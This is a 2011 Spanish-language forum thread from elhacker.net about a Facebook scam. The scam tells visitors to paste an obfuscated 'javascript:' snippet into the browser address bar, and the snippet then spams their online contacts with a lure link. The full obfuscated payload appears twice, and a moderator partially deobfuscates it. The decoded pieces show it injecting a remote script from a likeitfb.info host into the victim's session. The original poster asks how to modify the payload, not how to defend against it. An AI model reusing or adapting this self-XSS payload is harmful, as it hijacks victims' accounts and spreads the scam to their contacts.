elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  javascript Facebook
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: javascript Facebook  (Leído 3,471 veces)
Dunkansdk

Desconectado Desconectado

Mensajes: 25


Ver Perfil
javascript Facebook
« en: 4 Agosto 2011, 21:34 pm »

Hola a todos les comento que pasó, hay una página en facebook que te hace copiar y pegar en la dirección esto:

Citar
javascript:var _0x53f5=["\x37\x3A\x28\x61\x3D\x28\x62\x3D\x38\x29\x2E\x39\x28\x27\x36\x27\x29\x29\x2E\x63\x3D\x27\x2F\x2F\x35\x2E\x32\x2E\x33\x2E\x34\x2F\x31\x2F\x31\x2E\x64\x3F\x69\x3D\x27\x2B\x6A\x2E\x68\x28\x29\x2C\x62\x2E\x65\x2E\x66\x28\x61\x29\x3B\x67\x28\x30\x29","\x7C","\x73\x70\x6C\x69\x74","\x7C\x6E\x6F\x76\x69\x6F\x7C\x70\x72\x75\x65\x62\x61\x70\x69\x7C\x6C\x69\x6B\x65\x69\x74\x66\x62\x7C\x69\x6E\x66\x6F\x7C\x77\x77\x77\x7C\x73\x63\x72\x69\x70\x74\x7C\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x7C\x7C\x73\x72\x63\x7C\x6A\x73\x7C\x62\x6F\x64\x79\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x76\x6F\x69\x64\x7C\x72\x61\x6E\x64\x6F\x6D\x7C\x74\x6F\x6B\x65\x6E\x7C\x4D\x61\x74\x68","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0x24d3x1,_0x24d3x2,_0x24d3x3,_0x24d3x4,_0x24d3x5,_0x24d3x6){_0x24d3x5=function (_0x24d3x3){return _0x24d3x3.toString(36);} ;if(!_0x53f5[5][_0x53f5[4]](/^/,String)){while(_0x24d3x3--){_0x24d3x6[_0x24d3x3.toString(_0x24d3x2)]=_0x24d3x4[_0x24d3x3]||_0x24d3x3.toString(_0x24d3x2);} ;_0x24d3x4=[function (_0x24d3x5){return _0x24d3x6[_0x24d3x5];} ];_0x24d3x5=function (){return _0x53f5[6];} ;_0x24d3x3=1;} ;while(_0x24d3x3--){if(_0x24d3x4[_0x24d3x3]){_0x24d3x1=_0x24d3x1[_0x53f5[4]]( new RegExp(_0x53f5[7]+_0x24d3x5(_0x24d3x3)+_0x53f5[7],_0x53f5[8]),_0x24d3x4[_0x24d3x3]);} ;} ;return _0x24d3x1;} (_0x53f5[0],20,20,_0x53f5[3][_0x53f5[2]](_0x53f5[1]),0,{}));

Y luego envía este mensaje a todos tus contactos conectados:
Citar
definitivamente este es el novio mas valiente del mundo, mira lo que hizo por su novia: http://www.facebook.com/pages/El-novio-mas-valiente-del-mundo-Video/212722378775873

Me gustaría que me expliquen como modificarlo, ese mensaje esta en hex? o como es la cosa?

Un abrazo grande !


En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: javascript Facebook
« Respuesta #1 en: 4 Agosto 2011, 22:09 pm »

Sí se supone que ese código esta ofuscado.

Código
  1. javascript: var _0x53f5 = ["\x37\x3A\x28\x61\x3D\x28\x62\x3D\x38\x29\x2E\x39\x28\x27\x36\x27\x29\x29\x2E\x63\x3D\x27\x2F\x2F\x35\x2E\x32\x2E\x33\x2E\x34\x2F\x31\x2F\x31\x2E\x64\x3F\x69\x3D\x27\x2B\x6A\x2E\x68\x28\x29\x2C\x62\x2E\x65\x2E\x66\x28\x61\x29\x3B\x67\x28\x30\x29", "\x7C", "\x73\x70\x6C\x69\x74", "\x7C\x6E\x6F\x76\x69\x6F\x7C\x70\x72\x75\x65\x62\x61\x70\x69\x7C\x6C\x69\x6B\x65\x69\x74\x66\x62\x7C\x69\x6E\x66\x6F\x7C\x77\x77\x77\x7C\x73\x63\x72\x69\x70\x74\x7C\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x7C\x7C\x73\x72\x63\x7C\x6A\x73\x7C\x62\x6F\x64\x79\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x76\x6F\x69\x64\x7C\x72\x61\x6E\x64\x6F\x6D\x7C\x74\x6F\x6B\x65\x6E\x7C\x4D\x61\x74\x68", "\x72\x65\x70\x6C\x61\x63\x65", "", "\x5C\x77\x2B", "\x5C\x62", "\x67"];
  2. eval(function(_0x24d3x1, _0x24d3x2, _0x24d3x3, _0x24d3x4, _0x24d3x5, _0x24d3x6) {
  3.    _0x24d3x5 = function(_0x24d3x3) {
  4.        return _0x24d3x3.toString(36);
  5.    };
  6.    if (!_0x53f5[5][_0x53f5[4]](/^/, String)) {
  7.        while (_0x24d3x3--) {
  8.            _0x24d3x6[_0x24d3x3.toString(_0x24d3x2)] = _0x24d3x4[_0x24d3x3] || _0x24d3x3.toString(_0x24d3x2);
  9.        };
  10.        _0x24d3x4 = [function(_0x24d3x5) {
  11.            return _0x24d3x6[_0x24d3x5];
  12.        }];
  13.        _0x24d3x5 = function() {
  14.            return _0x53f5[6];
  15.        };
  16.        _0x24d3x3 = 1;
  17.    };
  18.    while (_0x24d3x3--) {
  19.        if (_0x24d3x4[_0x24d3x3]) {
  20.            _0x24d3x1 = _0x24d3x1[_0x53f5[4]](new RegExp(_0x53f5[7] + _0x24d3x5(_0x24d3x3) + _0x53f5[7], _0x53f5[8]), _0x24d3x4[_0x24d3x3]);
  21.        };
  22.    };
  23.    return _0x24d3x1;
  24. } (_0x53f5[0], 20, 20, _0x53f5[3][_0x53f5[2]](_0x53f5[1]), 0, {}));

Estrenaré mi Dreamweaver CS5 con estó :3


Quitando y reemplazando los valores del array _0x53f5,
Código
  1. eval(function(varOfus1, varOfus2, varOfus3, varOfus4, varOfus5, varOfus6) {
  2. varOfus5 = function(varOfus3){
  3. return varOfus3.toString(36);
  4. };
  5. if (!replace(/^/, String)){
  6. while (varOfus3--) {
  7. varOfus6[varOfus3.toString(varOfus2)] = varOfus4[varOfus3] || varOfus3.toString(varOfus2);
  8. };
  9. varOfus4 = [function(varOfus5) {
  10. return varOfus6[varOfus5];
  11. }];
  12. varOfus5 = function() {
  13. return '\w+';
  14. };
  15. varOfus3 = 1;
  16. };
  17. while (varOfus3--) {
  18. if (varOfus4[varOfus3]) {
  19. varOfus1 = varOfus1[replace](new RegExp('\b' + varOfus5(varOfus3) + '\b', g), varOfus4[varOfus3]);
  20. };
  21. };
  22. return varOfus1;
  23. } (
  24. _0x53f5[0],
  25. 20,
  26. 20, '|novio|pruebapi|likeitfb|info|www|script|javascript|document|createElement|||src|js|body|appendChild|void|random|token|Math'.split(|),
  27. 0,
  28. {}
  29.  )
  30. );
  31.  

No podré pasar más de ahí, envía unos parámetros que ni idea de como pueda sacarlos.


« Última modificación: 4 Agosto 2011, 22:35 pm por Shell Root » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Dunkansdk

Desconectado Desconectado

Mensajes: 25


Ver Perfil
Re: javascript Facebook
« Respuesta #2 en: 4 Agosto 2011, 22:12 pm »

Me ayudas a comprenderlo? jaaj
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
La película sobre Facebook no estará en Facebook
Noticias
wolfbcn 0 1,857 Último mensaje 10 Julio 2010, 13:54 pm
por wolfbcn
Facebook se adelanta a Google+ creando "Facebook for Business"
Noticias
wolfbcn 1 2,365 Último mensaje 29 Julio 2011, 22:29 pm
por _nivelinferior_
Autolike en Facebook - source javascript
Bugs y Exploits
el-brujo 0 3,525 Último mensaje 15 Octubre 2013, 11:54 am
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines